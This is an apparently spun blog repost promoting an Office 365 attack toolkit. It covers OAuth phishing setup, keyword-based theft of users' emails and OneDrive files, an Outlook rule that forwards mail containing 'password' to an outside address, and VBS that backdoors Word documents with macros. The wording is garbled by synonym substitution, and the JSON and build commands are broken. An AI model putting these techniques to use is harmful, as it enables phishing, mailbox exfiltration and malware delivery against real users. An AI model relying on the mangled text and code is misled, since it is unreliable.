O365-Attack-Toolkit – A Toolkit To Attack Office365

o365-attack-toolkit permits operators to accomplish an OAuth phishing assault and afterward use the Microsoft Graph API to extract fascinating data.
Some of the applied options are :

  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of recordsdata from OneDrive/Sharepoint.
  • Injection of macros on Word paperwork.

control interface can be used to check out the extracted data from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails will also be extracted by way of this toolkit the usage of key phrases. For each outlined key phrase within the configuration record, the entire emails that fit them might be downloaded and stored within the database. The operator can check out the downloaded emails during the control interface.

Onedrive/Sharepoint Keyworded Extraction
Microsoft Graph API can be utilized to get admission to recordsdata throughout OneDrive, OneDrive for Business and SharePoint report libraries. User recordsdata will also be extracted by way of this toolkit the usage of key phrases. For each outlined key phrase within the configuration record, the entire paperwork that fit them might be downloaded and stored in the community. The operator can read about the paperwork the usage of the control interface.

Outlook Rules Creation
Microsoft Graph API helps the advent of Outlook regulations. You can outline other regulations by way of hanging the rule of thumb JSON recordsdata within the regulations/ folder. https://medical doctors.microsoft.com/en-us/graph/api/mailfolder-put up-messagerules?view=graph-rest-1.0&tabs=cs
Below is an instance rule that after loaded, it is going to ahead each e mail that comprises password within the frame to [email protected].

{      
"displayName": "Example Rule",
"collection": 2,
"isEnabled": true,
"stipulations":
"bodyContains": [
"password"
]
,
"movements":
"aheadTo": [

"e mailAddress":

],
"stopProcessingRules": false

}

Word Document Macro Backdooring
Users paperwork hosted on OneDrive will also be backdoored by way of injecting macros. If this option is enabled, the remaining 15 paperwork accessed by way of the consumer might be downloaded and backdoored with the macro outlined within the configuration record. After the backdoored record has been uploaded, the extension of the report might be modified to .document to ensure that the macro to be supported on Word. It will have to be famous that when backdooring the paperwork, they are able to now not be edited on-line which will increase the possibilities of our payload execution.
This capability can best be used on Windows for the reason that insertion of macros is finished the usage of the Word COM object. A VBS record is constructed by way of the template beneath and done so do not panic in the event you see wscript.exe operating.

 Dim wdApp   Set wdApp = CreateObject("Word.Application")   wdApp.Documents.Open("")   wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "MACRO"   wdApp.Documents(1).SaveAs2 "OUTPUT", 0   wdApp.Quit  

How to arrange

Compile

 Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "MACRO"
wdApp.Documents(1).SaveAs2 "OUTPUT", 0
wdApp.Quit

Configuration
An instance configuration as beneath :

cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep make sure that
pass construct

Deployment
Before get started the usage of this toolkit you wish to have to create an Application at the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an utility.

After developing the appliance, reproduction the Application ID and alter it on static/index.html.
The URL(exterior listener) that might be used for phishing will have to be added as a Redirect URL. To upload a redirect url, pass the appliance and click on Add a Redirect URL.

The Redirect URL will have to be the URL that might be used to host the phishing endpoint, on this case https://myphishingurl.com/

Make certain to test each the containers as proven beneath :

It will have to be famous that you’ll run this device on any Operating Systems that Go helps, however the Macro Backdooring Functionality will best paintings on Windows.
The glance of the phishing web page will also be modified on static/index.html.

Security Considerations
Apart from the entire options this device has, it additionally opens some assault floor at the host operating the device. Firstly, the Macro Backdooring Functionality will open the phrase recordsdata, and in case you are operating an unpatched model of Office, unhealthy issues can occur. Additionally, the extraction of recordsdata can obtain malicious recordsdata which might be stored for your pc.
The easiest manner could be separating the host correctly and best permitting verbal exchange with the HTTPS redirector and Microsoft Graph API.

Management Interface
The control interface permits the operator to browse the information that has been extracted.

Users view

View User Emails

View Email

Download O365-Attack-Toolkit

Published by Marshmallow

Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).